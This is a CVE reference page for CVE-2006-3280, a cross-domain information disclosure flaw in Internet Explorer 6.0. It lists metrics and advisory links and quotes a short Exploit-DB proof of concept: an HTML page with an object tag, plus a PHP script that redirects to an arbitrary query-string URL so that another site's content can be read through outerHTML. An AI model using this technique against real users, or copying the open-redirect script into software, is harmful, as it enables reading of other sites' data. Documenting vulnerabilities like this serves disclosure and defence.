CVE-2006-3280 : Detail

CVE-2006-3280

62.93%V4
Network
2006-06-28
20h00 +00:00
2018-10-18
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, aka "Redirect Cross-Domain Information Disclosure Vulnerability."

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 28118

Publication date : 2006-06-26 22h00 +00:00
Author : Plebo Aesdi Nael
EDB Verified : Yes

source: https://www.securityfocus.com/bid/18682/info Microsoft Internet Explorer is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain policies. This issue may allow attackers to access arbitrary websites in the context of a targeted user's browser session. This may allow attackers to perform actions in web applications with the privileges of exploited users or to gain access to potentially sensitive information. This may aid attackers in further attacks. The following proof of concept is incomplete realization of the idea to demonstrate its feasibility. Windows Server 2003, Enterprise Edition, Service Pack 1, 15/06/2006 Upload the following files to Web server, go to i.html ------------------------- i.html ------------------------- <html> body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)"> <object width=100 height=100 data=r.php?http://www.google.com/123456789 type=text/html id=o></object> </body> </html> ------------------------- r.php ------------------------- <?php header("Location: ".$_SERVER["QUERY_STRING"]); ?> i.html displays content of Google Web page.

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6.0

References

http://secunia.com/advisories/20825
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.kb.cert.org/vuls/id/883108
Tags : third-party-advisory, x_refsource_CERT-VN
http://securitytracker.com/id?1016388
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/21396
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.vupen.com/english/advisories/2006/3212
Tags : vdb-entry, x_refsource_VUPEN
http://www.us-cert.gov/cas/techalerts/TA06-220A.html
Tags : third-party-advisory, x_refsource_CERT
http://www.securityfocus.com/bid/18682
Tags : vdb-entry, x_refsource_BID
http://www.vupen.com/english/advisories/2006/2553
Tags : vdb-entry, x_refsource_VUPEN